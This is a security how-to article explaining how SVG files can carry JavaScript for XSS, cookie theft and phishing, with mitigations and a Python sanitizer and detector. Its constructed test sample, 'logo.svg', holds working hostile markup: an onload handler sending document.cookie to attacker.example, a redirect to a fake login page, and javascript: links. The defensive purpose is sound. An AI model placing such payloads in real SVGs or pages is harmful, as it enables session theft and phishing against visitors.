SVG Files: the hidden malware threat you might be overlooking

New configuration (How To)

Situation

Unlike raster formats such as PNG or JPEG, an SVG file is not just an image: it is a text-based XML document that can carry JavaScript (in <script> elements and in on* event-handler attributes), CSS, SMIL animations and references to external resources. Because of this, a misused SVG can contain active content capable of:

  • Injecting attacker-controlled script into any website or application that embeds the file inline or serves it from its own origin

  • Stealing cookies or session data that are readable from the origin the file is served from

  • Redirecting users to phishing pages or malicious sites

  • Running cross-site scripting (XSS) attacks against web apps; when the file is hosted on the app's own domain this is a stored XSS that hits every visitor who opens it.

For example, a seemingly harmless logo.svg could contain an embedded <script> element, or an onload attribute on the root <svg> element, that runs as soon as a browser opens the file as a document. The important caveat is the loading context: browsers execute SVG script only when the file is loaded as a document, that is, navigated to directly or embedded with <object>, <iframe>, <embed> or pasted inline into the HTML. An SVG loaded through an <img> tag or as a CSS background image is rendered as a static picture and its script never runs. The hosting context, not just the file, decides whether an upload is dangerous.

Real-World Attack Scenarios

  1. Website Upload Exploits
    Attackers upload an SVG containing JavaScript to a content management system (CMS) that accepts it as an image without sanitizing it. If the CMS serves uploads from its own origin and a visitor, or an administrator browsing the media library, opens the file directly, or the site embeds it with <object> or inline, the script runs in the site's origin and can read its cookies and make authenticated requests in the victim's name. Embedding the same file with an <img> tag would not run it, which is why the mitigation has to cover how uploads are served, not only whether they are accepted.

  2. Phishing Campaigns
    SVGs can be sent as email attachments or through chat platforms, disguised as harmless images; mail filters that block executables and HTML attachments often let .svg through. When the recipient opens the file in a browser, the embedded script can redirect the victim to a credential-harvesting page, or HTML placed inside a <foreignObject> element can show a fake login form without ever leaving the file.

  3. Supply Chain Injections
    Third-party icon libraries or SVG packs downloaded from unverified sources can be preloaded with malicious scripts, compromising any site that uses them. Inlined icons are the worst case: the script runs inside the host page's DOM with the same privileges as the page's own JavaScript, so one poisoned icon in a dependency is a full client-side compromise.

How to Protect Against SVG-Based Attacks

  • Sanitize SVG files before use: parse them as XML and strip <script>, <foreignObject> and similar elements, every on* event-handler attribute, href and xlink:href values that are not same-document (#id) references, SMIL animations that retarget href, and @import or external url() references in CSS. Pattern-matching the raw text is not enough, because the browser decodes entities such as &#106;avascript: before the script runs.

  • Never load untrusted SVGs in a way that executes script: no inline <svg> markup, no <object>, <iframe> or <embed>. Reference them from an <img> tag or a CSS background instead, where the browser renders the picture but ignores its script.

  • Convert SVGs to a raster format such as PNG before publishing them on public-facing platforms, using a server-side renderer that itself ignores script and external references.

  • Serve user uploads from a separate origin (or with Content-Disposition: attachment) and send a Content Security Policy on the upload response, for example Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline', so that script and external loads are blocked even if a malicious file slips through. CSP applies to an SVG opened as a document just as it does to HTML, so this is the practical way to disable its inline JavaScript.

  • Only source SVGs from trusted providers, pin and review the versions of icon libraries you ship, and scan the files with antivirus or security tools; a simple text search for <script, on*= and javascript: is a cheap first-pass filter, though not a substitute for parser-based sanitization.
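The following is an added example, not code from this article or from any particular CMS: a conservative sanitizer in Python (standard library only) that implements the first mitigation above and doubles as a detector for the logo.svg scenario described earlier, since its findings list reports every piece of active content it had to remove. The two sample SVGs and the attacker.example host are constructed for this example.

```python
"""Detect and strip active content from an SVG before it is stored or served.
Added example (not the article author's code), standard library only.
Deliberately conservative: anything that can run script, embed HTML or reach
another origin is removed rather than repaired."""
import re
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"
ET.register_namespace("", SVG_NS)        # serialize the default namespace as xmlns="..."
ET.register_namespace("xlink", XLINK_NS)

# Elements that execute script or embed arbitrary HTML / remote documents.
BLOCKED_ELEMENTS = {"script", "foreignObject", "iframe", "object", "embed", "handler"}
# SMIL animation is harmless on geometry, but <set attributeName="href" to="javascript:...">
# retargets a link at runtime, so any animation of href is removed.
ANIMATION_ELEMENTS = {"set", "animate", "animateMotion", "animateTransform", "animateColor"}
# Attributes that hold a URL: href (SVG 2) and xlink:href (SVG 1.1) on <a>, <use>, <image>.
URL_ATTRIBUTES = {"href", "{%s}href" % XLINK_NS}
SAFE_DATA_URI = re.compile(r"^data:image/(png|jpeg|gif|webp);base64,", re.I)
CSS_URL = re.compile(r"url\(\s*['\"]?\s*([^'\")\s]*)", re.I)


def _local(name):
    """'{namespace}tag' -> 'tag' for element and attribute names."""
    return name.rsplit("}", 1)[-1]


def _url_allowed(value):
    """Allow only same-document references (#id) and inline raster images."""
    v = value.strip()
    return v.startswith("#") or bool(SAFE_DATA_URI.match(v))


def _looks_like_script(value):
    """javascript:/vbscript:/data:text/html in any attribute, ignoring embedded whitespace.
    The XML parser has already decoded entities, so &#106;avascript: arrives as javascript:."""
    v = re.sub(r"\s", "", value).lower()
    return v.startswith(("javascript:", "vbscript:")) or "data:text/html" in v


def _css_has_external_ref(css):
    """@import, or any url() whose target is not a same-document fragment."""
    if "@import" in css.lower():
        return True
    return any(not target.startswith("#") for target in CSS_URL.findall(css))


def _scrub(elem, findings):
    """Strip dangerous attributes of elem, then remove or recurse into its children."""
    tag = _local(elem.tag)
    for name, value in list(elem.attrib.items()):
        lname = _local(name)
        if lname.startswith("on"):
            reason = "event handler"
        elif _looks_like_script(value):
            reason = "script URL"
        elif name in URL_ATTRIBUTES and not _url_allowed(value):
            reason = "external URL"
        elif lname == "style" and _css_has_external_ref(value):
            reason = "external CSS reference"
        else:
            continue
        findings.append("removed %s on <%s> (%s)" % (lname, tag, reason))
        del elem.attrib[name]
    for child in list(elem):
        ctag = _local(child.tag)
        if ctag in BLOCKED_ELEMENTS:
            findings.append("removed <%s>" % ctag)
            elem.remove(child)
        elif ctag in ANIMATION_ELEMENTS and child.get("attributeName", "").split(":")[-1] == "href":
            findings.append("removed <%s> animating href" % ctag)
            elem.remove(child)
        elif ctag == "style" and _css_has_external_ref(child.text or ""):
            findings.append("removed <style> (external CSS reference)")
            elem.remove(child)
        else:
            _scrub(child, findings)


def sanitize_svg(svg_text):
    """Return (clean_svg, findings); an empty findings list means the file was already inert.
    Raises ValueError if the root element is not <svg>. For untrusted input in production,
    parse with defusedxml so entity expansion (billion laughs) cannot exhaust memory."""
    root = ET.fromstring(svg_text)   # comments, PIs such as <?xml-stylesheet?> and the DOCTYPE are dropped here
    if _local(root.tag) != "svg":
        raise ValueError("root element is <%s>, not <svg>" % _local(root.tag))
    findings = []
    _scrub(root, findings)
    return ET.tostring(root, encoding="unicode"), findings


# Constructed "logo.svg": renders as a blue badge but carries every trick discussed above.
MALICIOUS_LOGO_SVG = """<?xml version="1.0"?>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
     width="120" height="40" onload="fetch('https://attacker.example/c?'+document.cookie)">
  <script>location.href='https://attacker.example/login';</script>
  <rect width="120" height="40" fill="#1e90ff"/>
  <a xlink:href="&#106;avascript:alert(document.domain)"><text x="10" y="25">Logo</text></a>
  <a><set attributeName="xlink:href" to="javascript:alert(1)"/><text x="70" y="25">Help</text></a>
  <image xlink:href="https://attacker.example/track.png" width="1" height="1"/>
  <foreignObject width="100" height="40"><body xmlns="http://www.w3.org/1999/xhtml">
    <iframe src="https://attacker.example/"></iframe></body></foreignObject>
  <style>@import url("https://attacker.example/x.css");</style>
</svg>"""

# Constructed benign icon using the same-document forms the sanitizer must keep.
BENIGN_ICON_SVG = """<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <defs><linearGradient id="g"><stop offset="0" stop-color="#fff"/></linearGradient>
        <circle id="dot" r="4"/></defs>
  <rect width="20" height="20" fill="url(#g)" style="stroke:url(#g)"/>
  <use xlink:href="#dot" x="10" y="10"/>
</svg>"""

if __name__ == "__main__":
    clean, findings = sanitize_svg(MALICIOUS_LOGO_SVG)
    for finding in findings:
        print(finding)
    print(clean)
```

Run as a script it prints the seven findings for the constructed logo (the onload handler, the script element, the entity-encoded javascript: link, the SMIL retarget of href, the tracking image, the foreignObject and the @import stylesheet) followed by the cleaned markup, while the benign icon comes back unchanged with no findings. Two design choices matter: the file is parsed as XML and the checks run on decoded values, so entity tricks do not bypass them, and the parser silently drops comments, processing instructions and the DOCTYPE. In an upload pipeline, treat a non-empty findings list as a reason to reject the file rather than silently repairing it, and parse with defusedxml instead of the stdlib parser.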

Solution

Solution type

Permanent
